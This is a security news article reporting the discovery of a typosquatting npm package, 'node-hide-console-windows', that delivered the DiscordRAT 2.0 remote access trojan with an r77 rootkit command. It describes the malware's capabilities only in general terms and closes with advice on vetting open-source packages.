A malicious npm package has been discovered by researchers, hiding a full-service Discord remote access Trojan (RAT) that offers rootkit functionality. Known as “DiscordRAT 2.0,” this malware serves as a turnkey hacking tool, making it accessible even to newcomers in the hacking scene. Additionally, it significantly lowers the barrier to entry for conducting supply chain attacks on open-source software.
The deceptive npm package, called “node-hide-console-windows,” closely resembled a legitimate package known as “node-hide-console-window.” The legitimate package is a simple module designed to toggle an application’s console window visibility and is downloaded approximately 300 times per week. The malicious package was made to appear almost identical to the original, with 10 separate versions uploaded to match the original’s count. As a result, the copycat package was downloaded about 700 times before it was eventually taken down.
Ashlee Bengee, the director of threat intelligence advocacy at ReversingLabs, acknowledges the benefits of open-source software but also highlights the ease with which malicious behavior can be concealed within it. Bengee emphasizes that having open-source software available provides an opportunity for malicious actors to hide their activities effortlessly.
Researchers from ReversingLabs first discovered the copycat package, which was uploaded suspiciously on August 25th by a new account not connected to any other npm projects. Upon investigation, they found unobfuscated malicious code within its “index.js” file. Once executed, this code downloaded an executable file that turned out to be a copy of DiscordRAT 2.0.
DiscordRAT 2.0 is a compact, C#-based remote hacking tool that claims to be “for educational use only” on its GitHub page. However, doubts persist regarding its genuine intent. Bengee mentions that many such tools are released under the guise of being educational but are readily available for anyone to download as malware from platforms like GitHub. These easily accessible tools can be used to launch email campaigns with malware attachments, even by individuals with minimal knowledge or expertise.
What makes DiscordRAT 2.0 noteworthy is its user-friendly interface. Users can manage their victims through individual Discord channels, and the tool provides dozens of commands designed for easy use. These commands enable the theft of credentials, manipulation of files, termination of processes, and even the ability to bluescreen a host computer.
However, the most significant feature of DiscordRAT 2.0 is its “!rootkit” command. When triggered, this command executes a second open-source malware known as the r77 rootkit. This rootkit is designed to hide various elements, including TCP and UDP connections, files and directories, processes and CPU usage, and more. Any hacker with administrative privileges can utilize this rootkit to establish persistence on a host, carry out malicious activities, and gain access to highly privileged data, all without requiring extensive knowledge or expertise.
The existence of a full-service, turnkey RAT with these capabilities demonstrates how little skill even hackers need to possess in order to conduct relatively sophisticated attacks. This accessibility has opened the doors for aspiring attackers, especially since it presents an easy way for them to make a quick profit, as highlighted by Bengee.
While the discovery of this typosquatting npm package is concerning, it also highlights the need for enhanced security measures within the open-source software supply chain. Developers and users should exercise caution when downloading packages, verifying their authenticity and legitimacy. Additionally, maintaining up-to-date security software and monitoring for any suspicious or unauthorized activities are crucial steps in mitigating the risks associated with such malware attacks.